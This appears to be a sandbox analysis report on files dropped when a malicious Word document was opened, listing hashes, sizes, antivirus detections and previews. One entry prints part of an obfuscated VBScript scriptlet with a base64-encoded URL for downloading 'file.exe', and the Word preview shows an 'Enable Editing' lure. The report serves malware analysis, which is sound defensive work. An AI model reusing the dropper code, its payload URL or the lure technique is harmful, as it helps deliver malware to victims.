                                                          SHA-512:E7D91217A34A9CCE6D829903B12FB9FD49E104418488DEB83794D0779DCCF30D723E46F4DBC7FE0BA59FFFB4BBDEAB6D3AF2E46EF26112B4BAADAEEF4E74FC98
                                                          Malicious:false
                                                          Preview:c.0.5.P.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .t.o. .v.i.e.w. .t.h.e. .d.o.c.u.m.e.n.t.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.F.Z.d.t.f.h.g.Y.g.e.g.h.D.9 ....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K........................................................................................................................................... ...<...N...f...h...n...p...v.................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....OJ..QJ..U..^J..mH..sH.. .j..g...OJ..QJ..U..^J..mH..sH....OJ..QJ..^J..mH..sH.....h..N.OJ..QJ..^J.....h..N..h..N.OJ..QJ..^J.....h..N..h..N.5..OJ..QJ..^J....h..N..h..N.OJ..PJ..QJ..^J.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmp

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FE1210DB-2D28-4E8A-A9AA-48F09BC90D1C}.tmp

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3552060938024997
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlby:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                                                          MD5:8F34D16DF01F276F2E234FC9258B3727
                                                          SHA1:428153094C7CD2746DD5A708F5E39AFBF8662837
                                                          SHA-256:10E530C54C6FE6553CBDEC0ACA8A2E3F9D9EAC12A2A77A913DAB2061D2600550
                                                          SHA-512:48B7984A98A666C4F5243D1B7DF2017D78C73AC20F88B14E2F7CC519C329E2E4B4EAB9FFD0C20E6CDD54FB63D724C6521312D035156BAD123260646E0C8F2B66
                                                          Malicious:false
                                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):27285
                                                          Entropy (8bit):5.239363181413612
                                                          Encrypted:false
                                                          SSDEEP:384:fk5bxzaoaDabaRaOa2EqrRiymKviciqNEEE6oEaE3DvzLfanpob:sjzaoaDabaRaOa2EGYym1qSPW1LzOnpc
                                                          MD5:8BED1182F10668855D0EBF97E4D6AB19
                                                          SHA1:70026363421111F8B032D8BA267F1A3D6E39A9AB
                                                          SHA-256:DB605E4427B82B840EBEF2FBC01CAF768AB8557D823AFF39694E8C9532D8BAF2
                                                          SHA-512:73168037D3BF83D672511FAE9631026E73B17AD2B5E54904675C0496120FB1C16DB8D8A606A8159F718B8E58E945DEECE24A8D7F6C4B5743F7DF3BF2D8258162
                                                          Malicious:true
                                                          Preview:<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdo

                                                          C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT:Zone.Identifier

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:gAWY3n:qY3n
                                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]..ZoneId=3..

                                                          C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11776
                                                          Entropy (8bit):6.024446974480565
                                                          Encrypted:false
                                                          SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                          MD5:E23600029D1B09BDB1D422FB4E46F5A6
                                                          SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                                                          SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                                                          SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Royalistic.exe, Detection: malicious, Browse
                                                          • Filename: Royalistic.exe, Detection: malicious, Browse
                                                          • Filename: Annexationist.exe, Detection: malicious, Browse
                                                          • Filename: Annexationist.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: REQUEST_FOR_QUOTE.exe, Detection: malicious, Browse
                                                          • Filename: REQUEST_FOR_QUOTE.exe, Detection: malicious, Browse
                                                          • Filename: oOEAcj2CRw.exe, Detection: malicious, Browse
                                                          • Filename: oOEAcj2CRw.exe, Detection: malicious, Browse
                                                          • Filename: P8plQXLs5a.exe, Detection: malicious, Browse
                                                          • Filename: P8plQXLs5a.exe, Detection: malicious, Browse
                                                          • Filename: HFFIFAnqTY.exe, Detection: malicious, Browse
                                                          • Filename: HFFIFAnqTY.exe, Detection: malicious, Browse
                                                          • Filename: NEWORDER.EXE.exe, Detection: malicious, Browse
                                                          • Filename: NEWORDER.EXE.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11776
                                                          Entropy (8bit):6.024446974480565
                                                          Encrypted:false
                                                          SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                          MD5:E23600029D1B09BDB1D422FB4E46F5A6
                                                          SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                                                          SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                                                          SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11776
                                                          Entropy (8bit):6.024446974480565
                                                          Encrypted:false
                                                          SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                          MD5:E23600029D1B09BDB1D422FB4E46F5A6
                                                          SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                                                          SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                                                          SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\TEPO0015922.LNK

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:59 2022, mtime=Tue Mar 8 15:45:59 2022, atime=Sat Mar 18 11:34:15 2023, length=248144, window=hide
                                                          Category:dropped
                                                          Size (bytes):1019
                                                          Entropy (8bit):4.5488977700317035
                                                          Encrypted:false
                                                          SSDEEP:24:8oE3k/XT89dqPplqMNef/1+WDv3q+cX7cY:8osk/XTko7NC/a+Kl
                                                          MD5:A437967E1061678D0FF0E50870435957
                                                          SHA1:BC5F02EA09D07829F2B9C03F75C515911240F215
                                                          SHA-256:DBFCEDA42BC9CC0A58EC27B58946233256391507B83DC57643D12AFDE3F2EB6A
                                                          SHA-512:CA679DA91B7459CCFFCAF1AA47589FF7E55A6A06F8155A9E8540AC7D50C7FDDFC6CADFFA92162733816FC0A1947167F15191808CE9854ED52697D7F7A0627FFE
                                                          Malicious:false
                                                          Preview:L..................F.... .....k..3....k..3...@..Y..P............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.P...rVHd .TEPO00~1.DOC..L......hT..hT..*...r.....'...............T.E.P.O.0.0.1.5.9.2.2...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\TEPO0015922.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.E.P.O.0.0.1.5.9.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9I..N..... .....[D_....3N...W...9I

                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Generic INItialization configuration [doc]
                                                          Category:dropped
                                                          Size (bytes):73
                                                          Entropy (8bit):4.708249518901646
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlpwxXpulmX1mzXpulv:bCiwRpur7pu1
                                                          MD5:171A06F44A4A1DF6E94542EC2401B637
                                                          SHA1:0CBD760BE24649A735405B819571C0FA21DD4FE3
                                                          SHA-256:E9570E3F648D804D3339EE4C51DD2E09E45213D17E5AED1A608264BE1C62AAFD
                                                          SHA-512:999E5638639B4028DBB7BFFD2901EC0D1028E96766C469F445F9CB518B3160E57ADEDDA18C42CC25AAF870FE008B289E3ECAA6B241D4F4FD503AC3B891355943
                                                          Malicious:false
                                                          Preview:[folders]..Templates.LNK=0..TEPO0015922.LNK=0..[doc]..TEPO0015922.LNK=0..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.503835550707525
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                          MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                          SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                          SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                          SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                          Malicious:false
                                                          Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview:..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0TIZ5KP0HTH2PPHMB9S2.temp

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF501bcb.TMP (copy)

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF504a59.TMP (copy)

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9YQ9PYJ6KG059DAWKHEY.temp

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJUBHAZA5OF447Z3CQQ4.temp

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
